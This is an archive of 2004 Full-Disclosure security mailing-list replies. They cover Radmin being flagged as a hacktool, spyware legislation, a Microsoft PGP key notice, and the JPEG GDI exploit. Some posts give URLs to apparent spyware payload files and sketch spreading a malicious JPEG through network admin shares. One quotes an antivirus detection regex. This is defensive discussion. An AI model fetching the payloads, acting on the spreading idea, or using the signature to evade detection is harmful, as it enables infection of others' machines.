That is a widely used tool that is dropped by various malware programs. I think even one of the JPEG exploits was dropping radmin.exe It be better to assume you have a infection and prove yourself wrong than the other way around. Look into it pretty deep, I would suggest. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Sowhat . Sent: Tuesday, October 12, 2004 7:51 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! hi list I have installed Norton AntiVirus 2005 ,and when i open my F:\ directory ,Norton pops up and show that,Norton AntiVirus has detected a virus on your computer Boject Name F:\radmin.exe Virus Name Hacktool. Is RemoteAdministrator a commercial remote control software or a Hacktool ? the following information is copied from the Radmin's site: (http://www.radmin.com/) This fast, reliable, easy-to-use pc remote control software saves you hours of running up and down stairs between computers. Radmin allows you to take control of another PC on a LAN, WAN or dial-up connection so you see the remote computer's screen on your monitor and all your mouse movements and keystrokes are directly transferred to the remote machine. Radmin provides fast secure access to remote PC's on Windows platforms. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!
I do agree with you Peter about the server and client part. I truly believe that Norton is detecting it as such only because it is being used in exploits. There are many exploits that drop this client onto the workstation. If you know it is there then the detection shouldn't surprise you. But if you are e-mailing a list asking about it and what it is. You most likely didn't install it. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse Sent: Tuesday, October 12, 2004 10:41 AM To: Todd Towles; Sowhat .; [EMAIL PROTECTED] Subject: SV: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Keep in mind that there's a client and a server part in the Radmin installation. During installation of this commercial software you'll have the option to choose wether you want to install the server or only the client. If the client software is detected as malicious this would indeed be a bad call. However, if Symantec labels the server as a backdoor risk, it's likely because it was distributed as part of a malware package not so long ago (a few weeks back). Still, this doesn't justify to label the Radmin Client as a security risk. The Radmin software is widely used for remote administration in the same manner as VNC, Terminal Services or Netbus ;-) Regards Peter Kruse -Oprindelig meddelelse- Fra: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] vegne af Todd Towles Sendt: 12. oktober 2004 16:15 Til: Sowhat .; [EMAIL PROTECTED] Emne: RE: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! That is a widely used tool that is dropped by various malware programs. I think even one of the JPEG exploits was dropping radmin.exe It be better to assume you have a infection and prove yourself wrong than the other way around. Look into it pretty deep, I would suggest. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Sowhat . Sent: Tuesday, October 12, 2004 7:51 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??! hi ,list I have installed Norton AntiVirus 2005 ,and when i open my F:\ directory ,Norton pops up and show that,Norton AntiVirus has detected a virus on your computer Boject Name F:\radmin.exe Virus Name Hacktool. Is RemoteAdministrator a commercial remote control software or a Hacktool ? the following information is copied from the Radmin's site: (http://www.radmin.com/) This fast, reliable, easy-to-use pc remote control software saves you hours of running up and down stairs between computers. Radmin allows you to take control of another PC on a LAN, WAN or dial-up connection so you see the remote computer's screen on your monitor and all your mouse movements and keystrokes are directly transferred to the remote machine. Radmin provides fast secure access to remote PC's on Windows platforms. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQA/AwUBQWv68HxYZNa+g/pgEQKOiwCePgzmaczX3p55JZXV4DvZcxox/GcAn3Kc q+lT8pAgWbC+ESuAaZRQNkYo =bmBO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] House approves spyware legislation
Why make more computer laws...when the current computer laws can not be enforced correctl? We all know that the CAN-SPAM Act really cut the spam out of our e-mails *sigh* Then the INDUCE act will make half the stuff in a normal person's house illegal. Making laws is just playing around...paper on top of paper doesn't stop anything. It all falls back to the old saying - Action speaks louder than words. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gregory Gilliss Sent: Wednesday, October 06, 2004 7:04 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] House approves spyware legislation Great, Not that I'm any fan of spyware, but this is just another law against hacking. Think - what's the difference between this and someone using XSS to take control of a computer? If you r00t a box and deface the home page, then you've broken this law. sigh Instead of fixing the problem (poor software security) we pass laws to punish the people who do the things that illustrate the problem. Basic philosophical differences, blah blah blah ... Worst of all, do you really think that the spyware rackets will slow down or cease because of this? Nope - they'll just migrate out of the jurisdiction. -- Greg On or about 2004.10.06 06:03:18 +, RandallM ([EMAIL PROTECTED]) said: The U.S. House of Representatives voted late Tuesday to restrict some of the most deceptive forms of spyware. By a 399-1 vote, House members approved legislation prohibiting taking control of a computer, surreptitiously modifying a Web browser's home page, or disabling antivirus software without proper authorization. http://news.com.com/House+approves+spyware+legislation/2100-1028_3-539 7822.h tml?tag=nefd.top thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED] Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] real spam from secure@microsoft.com ?
Well, the e-mail did say this... You are receiving this email because you have communicated with the Microsoft Security Response Center using PGP in the past. Therefore it would make sense that they tell you about their new PGP key..as long as the sender is real...but that is another story. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Georgi Guninski Sent: Wednesday, October 06, 2004 6:18 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] real spam from [EMAIL PROTECTED] ? got this in my mailbox. looks like spam from [EMAIL PROTECTED] they don't even provide unsubscribe instructions. lamers. -- georgi - Forwarded message from Microsoft Security Response Center [EMAIL PROTECTED] - X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Subject: New Microsoft Security Response Center PGP Key [pgp] Date: Tue, 5 Oct 2004 15:40:01 -0700 X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: New Microsoft Security Response Center PGP Key [pgp] Thread-Index: AcSrLElFE3KUx/ffQnuyvPfsYOdiBg== From: Microsoft Security Response Center [EMAIL PROTECTED] Cc: Microsoft Security Response Center [EMAIL PROTECTED] X-OriginalArrivalTime: 05 Oct 2004 22:40:30.0206 (UTC) FILETIME=[512D71E0:01C4AB2C] X-MailScanner-Information: Please contact the ISP for more information X-MScanner: Clean Hello! The Microsoft Security Response Center has generated a new PGP key. We use this key to sign all security bulletin notifications and encourage others to use this key when sending sensitive information to us. Our new key is available at: - https://www.microsoft.com/technet/security/bulletin/pgp.mspx - ldap://keyserver.pgp.com/ and other public PGP key servers - At the bottom of this message You can verify the fingerprint of our key at: - https://www.microsoft.com/technet/security/bulletin/pgp.mspx A revoked copy of our former key is available at: - ldap://keyserver.pgp.com/ and other public PGP key servers - At the bottom of this message If you would like to submit an encrypted security vulnerability report, please email us at [EMAIL PROTECTED] Sincerely, Microsoft Security Response Center New Key (0xAA55BC66): -BEGIN PGP PUBLIC KEY BLOCK- Version: PGP 8.1 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
RE: [Full-Disclosure] Sans GDI scan says still vulnerable after patching
I suggest you search in the patchmanagment mailing list on patchmanagement.org Sorry to tell you, but the OS isn't the only thing that needs patching. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of BillyBobKnob Sent: Wednesday, October 06, 2004 10:16 AM To: Full Disclosure Subject: [Full-Disclosure] Sans GDI scan says still vulnerable after patching I have patched some systems at work with the MS04-028 patch and then ran the Sans GDI scanner which said that they are still vulnerable. Any ideas why ? F:\WINDOWS\system32\dllcache\sxs.dll Version: 5.1.2600.136 -- Vulnerable version F:\WINDOWS\system32\sxs.dll Version: 5.1.2600.136 -- Vulnerable version Thanks Bill ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box
To expand on this About Wrap. I have posted images to this site beforebefore the site went downhill. Some of the authors would allow the site to wrap their images with ads (therefore making money for the site). It appears they are now wrapping images with installed ad-ware. It appears the new owners have taken it over for the money. Not the artwork. Just my 2 cents -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Willem Koenings Sent: Monday, October 04, 2004 9:55 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Spyware installs with no interaction in IE on fully patched XP SP2 box hi, I was unable to verify it, since I don't use IE, and would prefer not infecting myself on accident, however I did run across this: http://themexp.org/about_wrap.php Perhaps one of the themes you downloaded was bundled with the spyware? two tiny links from there: http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab W. -- ___ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
FW: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs
Meant for the list I believe. -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Wednesday, September 29, 2004 1:05 PM To: Todd Towles Subject: Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs That's also my understanding, and expereince, from testing it. I'm sure it's possible to find other ways to toy with JPEG parsing, such as wallpaper. (I believe Todd brought this up before somewhere.) Try it with Active Desktop (as you'll need to when setting a JPEG to wallpaper), which uses IE to parse/display. -- Peace. ~G On Tue, 28 Sep 2004 11:41:48 -0500, Todd Towles [EMAIL PROTECTED] wrote: It is possible to view a JPEG in a unpatched IE and it will automatic install programs. This is my understanding. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20
What if it copies itself to the wallpaper? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Geo. Sent: Tuesday, September 28, 2004 1:27 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 far-fetched. Would it be possible to create a jpeg that would copy itself to other drives on a shared network in an auto-executable position? I suppose so... however, it would be noisy and probably wouldn't be amazingly successful. Picture a company full of users and a worm that copys the jpg file to \\machinename\c$\Documents and Settings\All Users\Desktop you think it might get a few clicks, especially if it had a harmeless yet tempting name like saturn.jpg Geo. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
FW: [Full-Disclosure] JPEG AV Detection
What exactly are the AV products detecting in the JPEG exploits? Barry and I was talking about how impressed we were that the AV companies jumped on this one and detection was pretty fast. But is the detection so generic that a variant will bypass? Is the detection based on a original exploit that could be modified in a way that makes it undetectable right now? -Todd -Original Message- From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 28, 2004 1:55 PM To: Todd Towles Subject: Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs Todd Towles wrote: Yep, really surprised. Just hopefully the invalid data that is being detected can't be changed or worked in a work that would bypass normal detection. Once the file is renamed to a BMP or a GIF, you confuse the whole thing even more. Are the AV products hitting on a part of the original exploit? Can this part be changed in a future version to make it undetectable. I am very impressed at the work of the AV companines on this one, but I also know that is this detection is too simple, that it will be bypassed. I'm not sure what they're specifically detecting. This may be a good question for the list. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: FW: [Full-Disclosure] JPEG AV Detection
That would seem to be in the Char_Header function... -Original Message- From: Aaron Horst [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 28, 2004 3:08 PM To: [EMAIL PROTECTED] Cc: Todd Towles Subject: RE: FW: [Full-Disclosure] JPEG AV Detection Best I can tell, the Norton filter looks something like this: \xFF\xD8.*\xFF[\xE1\xE2\xED\xFE]\x00[\x00\x01].* AnthraX101 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
